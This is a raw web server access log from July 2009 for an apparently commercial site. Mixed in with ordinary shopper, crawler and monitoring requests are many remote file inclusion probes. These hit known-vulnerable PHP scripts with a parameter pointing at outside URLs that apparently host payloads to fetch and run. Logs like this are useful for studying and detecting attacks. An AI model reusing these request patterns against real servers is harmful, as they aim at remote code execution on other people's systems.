94.23.2.21 - - [16/Jul/2009:02:46:32 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:46:32 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:46:45 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jul/2009:02:47:01 -0400] "GET /logs/access_log.Q109053000%20%20//vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:47:08 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:47:15 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:47:36 -0400] "GET /logs/access_log.Q109070300%20%20//vwar/backup/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:47:36 -0400] "GET //vwar/backup/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:47:36 -0400] "GET /logs//vwar/backup/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
112.199.162.37 - - [16/Jul/2009:02:48:17 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:20 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:20 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:20 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:20 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:22 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:23 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:23 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:23 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:24 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:25 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:25 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:26 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:26 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:27 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:27 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:28 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:28 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:29 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:29 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:48:29 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
209.59.12.99 - - [16/Jul/2009:02:48:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [16/Jul/2009:02:48:59 -0400] "GET /images/items/index_bone_over.jpg HTTP/1.1" 200 1741 "-" "Googlebot-Image/1.0"
124.0.237.140 - - [16/Jul/2009:02:49:07 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:02:49:07 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:02:49:07 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:49:14 -0400] "GET /logs/access_log.Q109060200%20%20//vwar/backup/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
193.33.21.12 - - [16/Jul/2009:02:49:42 -0400] "GET /logs/access_log.Q109052700/http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
71.132.134.217 - - [16/Jul/2009:02:47:47 -0400] "GET /logs/access_log.Q109051200 HTTP/1.1" 200 6040641 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.0.237.140 - - [16/Jul/2009:02:50:03 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:50:07 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:50:07 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:50:07 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
71.132.134.217 - - [16/Jul/2009:02:47:54 -0400] "GET /logs/access_log.Q109051400 HTTP/1.1" 200 6017281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
219.85.63.226 - - [16/Jul/2009:02:50:13 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:50:13 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:50:13 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:50:15 -0400] "GET /logs/access_log.Q109070200//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.74.99.225 - - [16/Jul/2009:02:50:18 -0400] "GET /logs/access_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
193.33.21.12 - - [16/Jul/2009:02:50:18 -0400] "GET /logs/access_log.Q109050900/contrib/yabbse/poc.php?sourcedir=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
219.85.63.226 - - [16/Jul/2009:02:50:19 -0400] "GET /logs/access_log.Q109070200//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.74.99.225 - - [16/Jul/2009:02:50:21 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
117.74.99.225 - - [16/Jul/2009:02:50:21 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
117.74.99.225 - - [16/Jul/2009:02:50:30 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
117.74.99.225 - - [16/Jul/2009:02:50:32 -0400] "GET /logs/access_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
117.74.99.225 - - [16/Jul/2009:02:50:33 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
65.254.32.2 - - [16/Jul/2009:02:50:52 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:02:50:52 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:02:50:52 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:51:07 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:51:07 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:51:07 -0400] "GET /logs/access_log.Q109063000%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:51:16 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:51:16 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:51:16 -0400] "GET /logs/access_log.Q109063000%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:51:25 -0400] "GET /logs/access_log.Q109070200%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:51:35 -0400] "GET /logs/access_log.Q109070200%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.172.33.230 - - [16/Jul/2009:02:52:14 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
209.172.33.230 - - [16/Jul/2009:02:52:14 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
209.172.33.230 - - [16/Jul/2009:02:52:14 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.812"
209.172.33.230 - - [16/Jul/2009:02:52:19 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.812"
76.12.17.218 - - [16/Jul/2009:02:52:20 -0400] "GET /logs/access_log.Q109052900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:52:20 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:52:23 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:52:23 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:52:23 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:52:25 -0400] "GET /logs/access_log.Q109050900%20%20//vwar/backup/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:02:52:28 -0400] "GET /logs/access_log.Q109070200//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.74.99.225 - - [16/Jul/2009:02:52:48 -0400] "GET /logs/error_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
121.78.116.209 - - [16/Jul/2009:02:53:10 -0400] "GET /logs/access_log.Q109053000%20%20//vwar/backup/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
117.74.99.225 - - [16/Jul/2009:02:53:19 -0400] "GET /logs/error_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
76.12.17.218 - - [16/Jul/2009:02:53:27 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:02:53:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.245.84 - - [16/Jul/2009:02:53:44 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:02:54:02 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:02:54:14 -0400] "GET /logs/access_log.Q109061900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:02:54:14 -0400] "GET /logs/access_log.Q109062900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:02:54:14 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:02:54:14 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
112.199.162.37 - - [16/Jul/2009:02:54:15 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:54:15 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:54:15 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.162.37 - - [16/Jul/2009:02:54:15 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
193.33.21.12 - - [16/Jul/2009:02:54:30 -0400] "GET /logs/access_log.Q109052700/contrib/yabbse/poc.php?sourcedir=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.172.33.230 - - [16/Jul/2009:02:54:45 -0400] "GET /logs/error_log.Q109060300%20//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
209.172.33.230 - - [16/Jul/2009:02:54:45 -0400] "GET /logs/access_log.Q109070300%20//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
84.201.208.50 - - [16/Jul/2009:02:55:59 -0400] "GET /logs/access_log.Q109070300//vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:02:56:20 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:02:56:20 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:02:56:20 -0400] "GET /logs/access_log.Q109062900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:02:56:40 -0400] "GET /logs/access_log.Q109061900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:57:12 -0400] "GET /logs/access_log.Q109070300//vwar/backup/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:57:24 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:02:57:46 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:02:57:46 -0400] "GET /logs/access_log.Q109061900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:02:57:46 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:58:24 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:58:49 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:02:59:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [16/Jul/2009:03:01:24 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
